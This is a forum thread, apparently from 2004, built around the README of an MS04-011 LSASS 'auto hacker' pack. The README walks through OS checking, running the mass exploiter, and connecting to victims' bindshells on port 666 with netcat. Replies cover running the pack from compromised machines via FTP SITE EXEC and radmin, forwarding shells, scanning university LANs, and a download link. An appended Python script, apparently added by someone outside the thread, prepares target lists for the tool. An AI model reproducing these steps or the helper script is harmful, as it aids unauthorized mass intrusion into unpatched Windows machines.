XeLoRy

 ======================================
|                                      |
| MS04011 Lsasrv.dll RPC Auto Hacker   |
|  (c) 2004 by cyrex                   |
|       ENJOY!                         |
 \__ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _  __/


This Auto Hacker is not for any abuse action
;) all rights provided by cyrex..

You know the rest of the shit..


Steps:

1. Which files does the auto hacker contain?
2. What shit is what?
3. How to use?
4. Contact
5. !!!!! FAQ !!!!

---------------------------------------------------
1.
 
check.exe
root.exe
lsass.exe

2 && 3.

check.exe:

This program will check the results of scan.txt from
scan100/500/1000.exe.
We start the program with the following arguments:

c:\> check.exe scan.txt -t

When it is finished, a new text file is created
named checked.txt; the information in this txt file is
something like this:

Windows 5.0 127.0.0.1
Windows 5.1 192.168.1.3


We see the first IP is Win2k and the second WinXP.
It's time to use root.exe.

root.exe:

This program is our Auto Hacker;) please DON'T DELETE checked.txt;
this file is required for root.exe, else it won't work. Also don't modify
the file.

Just start root.exe without any parameters:

C:\lsass>root

 ======================================
|                                      |
| MS04011 Lsasrv.dll RPC Auto Hacker   |
|  (c) 2004 by cyrex                   |
|       ENJOY!                         |
 \__ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _  __/

[*] Creating Auto Hacking File...
[*] Finished..
[*] Sleeping a while

....

The program creates a temp file which is needed for root.exe.
The Auto Hacker generally uses a BINDSHELL, so if it stops at
Attacking..OK for like 3 - 4 seconds,
try to netcat to the IP on port 666:

nc IP 666 !!! <- IMPORTANT

Once you connect to the server with nc, the autohacker
exploits the next target;)
and you open a new netcat and connect again and again.


lsass.exe:
 
This program is the main program;) but modified by cyrex
especially for the autohacker..

For more info, just start lsass.exe.

4.

try to find me,
my name is cyrex


GREETZ to kids who use this pack
and greetz to my friends

5. FAQ PLEASE READ FOR WIN2k USERS ONLY

Q: Why can't I run it on Windows 2000?
A:
 If you want to use this root.exe too,
 just create a directory called

 c:\WINDOWS\system32

 and put cmd.exe in it.



Well, I love this autohax0r, but how can I use it on a remote box without going through radmin viewer or VNC (too lame)?? Because when I start check scan.txt -t in a netcat shell, I don't get an answer in the shell; the exe file is loaded as a process, but it doesn't create any checked.txt :(
Can anyone help me exploit and autohax with this autohaxor on a remote box via shell?

Thanks a lot for all answers and advice ;)
RedShadow
lsass is dead; Sasser and all the other lsass worms killed it.
XeLoRy
Not dead for me, I still have mass results in LAN scans ;)
but could you help me plz?
slynx
You know, it kind of hurts me every time someone says an exploit is dead.
Exploits don't die. Sometimes ISPs will block that port over the internet, but
that doesn't mean there aren't machines still vulnerable to it. Besides that, the lsass
overflow is an RPC exploit, and I'm surprised netbios and the like was ever allowed
over the public internet.

Exploits like this are just as valuable now as they were when you saw the first
post on Bugtraq.... there are still just as many machines out there to exploit with
this. So what if you can't get SYSTEM on personal computers over the internet now?
It wasn't a server exploit anyway; it's not meant to be!

I still find about 1/2 of the machines scanned during penetration tests on corporate
networks to be vulnerable to the old MS03-026 RPC DCOM Buffer Overflow. About
3/4 with lsass. If this kind of a script isn't a good way to demonstrate poor security
practices, I don't know what is.

Sorry for my rambling it's 1:30 am here and I've been sick all week.... just my
$0.02

FYI - I don't endorse script kiddies (which cyrex is obviously king of), but if you post
the files I may be able to help you with the nc shell issue, since that's more
universal than "how can i use this to pwn everyone on my subnet?"

And no, by "this kind of a script" I'm not referring to autohackers, just exploits ....
(although automated pen-tests like those in CORE IMPACT do indeed make life
a little easier...)

Sorry for harshness of this post :/
G777
Why don't you just write your own script?
I made a simple one for the hod sploit and it still gets results on internal scans.
Basically I execute the scan command via FTP SITE EXEC, and when it's done I execute the autohack batch file from radmin's telnet.
It works great and all shells are forwarded to my IP.
However, you will get more results running it from the desktop on the remote machine and having the shells connect back there ;)
T3cHn0b0y
The program probably won't run at SYSTEM level, so you need to execute it as a user with a proper user profile. You can do this with runas:

runas /user:Administrator [program]

Or better still, modify the service properties which cmd.exe is running under. Serv-U? Change the logon profile to a valid user on the box.
ANTITRUST
Does Y have a bond to test the tools?

;)
ShouiZen
Yep,
where is the tool?? XeLoRy
BBQ CD
Would be great if someone could serve check.exe ... didn't find it yet!
blahplok
Thanks.... although lsass is dead, maybe it will be useful some day....
globey
It's kind of a useless tool; most of the fast servers are patched against this hole, so this tool can't help us.

But thanks anyway dude, nice tool.
ivan288
It's not DEAD!!! Try to scan a LAN at a uni, you'll get plenty of results.
XeLoRy
QUOTE (ShouiZen @ Jul 3 2004, 03:41 PM)
yep,
Where is the tool ?? XeLoRy

Check the topic on the forum; I can't post it a second time because it's still available on the forum. Try the search engine...
forza
Does anybody have a link to download?
dijk
Maybe a little late, but found it on google:

http://ns2.elhacker.net/rojodos/exploits/aut0r00ter_final.rar
maydje
Weird ... I d/l'd this yesterday to give it a go since lsass is definitely not dead ... when I tried the check.exe <filename> -t command I got this error:

===============================================
MS04011 Lsasrv.dll RPC OS Checker v1.1 by cyrex
===============================================

[-] gethostbyname : Operation not permitted


Anyone else run into this one?
maydje
Problem solved: I removed the cygwin DLLs that are installed with the stripped-down metasploit cyg, and removed all extra text from the scan.txt file created by scan500.
alpha|beta
QUOTE (maydje @ Sep 16 2004, 01:48 PM)
[-] gethostbyname : Operation not permitted

A possible WinXP SP2 issue perhaps? Ah, never mind, I just saw your reply. Enjoy.
IcedOut3E
Yeah, just to add to that in case anyone else has that problem.

I only get that when there are other words in the scan.txt file. The scan.txt file needs to be just IPs.

Hope that clarifies it.
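Added example (not part of cyrex's pack and not from any poster in this thread): a small Python script for the two text files the README and the later posts revolve around. It strips scan.txt down to bare IPv4 addresses, which is the fix maydje and IcedOut3E arrived at for the "gethostbyname : Operation not permitted" error, and it parses the "Windows 5.0 127.0.0.1" layout of checked.txt into targets grouped by OS version (5.0 = Win2k and 5.1 = WinXP per the README; 5.2 is Windows Server 2003, which the README does not mention). The sample scanner output is constructed for this example, since the thread never shows what scan100/500/1000.exe actually write, and the `SAMPLE_*` names, `clean_scan_lines`, `parse_checked` and `targets_for` are this example's own.

```python
import ipaddress
import re
import sys

# Constructed sample of a scan.txt with the kind of extra text the thread blames
# for the gethostbyname error (banner, progress lines, a bogus address).
SAMPLE_SCAN_TXT = """\
MS04011 scanner v0.9
Scanning 192.168.1.0/24 for port 445 ...
192.168.1.3
192.168.1.7
Host 192.168.1.9 is up
192.168.1.3
999.1.1.1
done, 3 hosts found
"""

# Constructed checked.txt in the "Windows <major>.<minor> <ip>" layout the README shows.
SAMPLE_CHECKED_TXT = """\
Windows 5.0 127.0.0.1
Windows 5.1 192.168.1.3
Windows 5.2 192.168.1.7
some stray line that is not a result
"""

# 5.0 and 5.1 come from the README; 5.2 (Windows Server 2003) is added here as an assumption.
OS_NAMES = {"5.0": "Windows 2000", "5.1": "Windows XP", "5.2": "Windows Server 2003"}

CHECKED_RE = re.compile(r"^Windows (\d+\.\d+) (\d{1,3}(?:\.\d{1,3}){3})$")


def clean_scan_lines(text):
    """Return (ips, rejected): the lines that are a bare, valid IPv4 address
    (deduplicated, in order) and the lines that were dropped.

    A line that mixes an address with other words is dropped whole instead of
    having the address extracted: the scanner did not list that host on its
    own line, and pulling '192.168.1.0' out of a 'Scanning 192.168.1.0/24'
    banner would feed the checker a network address."""
    ips, rejected, seen = [], [], set()
    for raw in text.splitlines():
        tok = raw.strip()
        if not tok:
            continue
        try:
            ip = str(ipaddress.IPv4Address(tok))
        except ValueError:
            rejected.append(raw)
            continue
        if ip not in seen:
            seen.add(ip)
            ips.append(ip)
    return ips, rejected


def parse_checked(text):
    """Parse checked.txt into [(ip, version, os_name)], skipping lines that do
    not match the 'Windows x.y a.b.c.d' layout or carry an invalid address."""
    targets = []
    for raw in text.splitlines():
        m = CHECKED_RE.match(raw.strip())
        if not m:
            continue
        ver, ip = m.group(1), m.group(2)
        try:
            ipaddress.IPv4Address(ip)
        except ValueError:
            continue
        targets.append((ip, ver, OS_NAMES.get(ver, "unknown")))
    return targets


def targets_for(text, version):
    """IPs in checked.txt reported as the given Windows version string."""
    return [ip for ip, ver, _ in parse_checked(text) if ver == version]


if __name__ == "__main__":
    # Usage: python clean_scan.py scan.txt cleaned.txt
    # Without arguments it runs on the constructed samples above.
    if len(sys.argv) == 3:
        with open(sys.argv[1]) as f:
            ips, rejected = clean_scan_lines(f.read())
        with open(sys.argv[2], "w") as f:
            f.write("\n".join(ips) + "\n")
        print("kept %d addresses, dropped %d lines" % (len(ips), len(rejected)))
    else:
        ips, rejected = clean_scan_lines(SAMPLE_SCAN_TXT)
        print("clean scan list:", ips)
        print("dropped:", rejected)
        for ip, ver, name in parse_checked(SAMPLE_CHECKED_TXT):
            print("%-15s Windows %s (%s)" % (ip, ver, name))
```

Feed the cleaned file to `check.exe cleaned.txt -t` instead of the raw scanner output; the dropped lines are printed so that a host reported only inside a progress line is not silently lost.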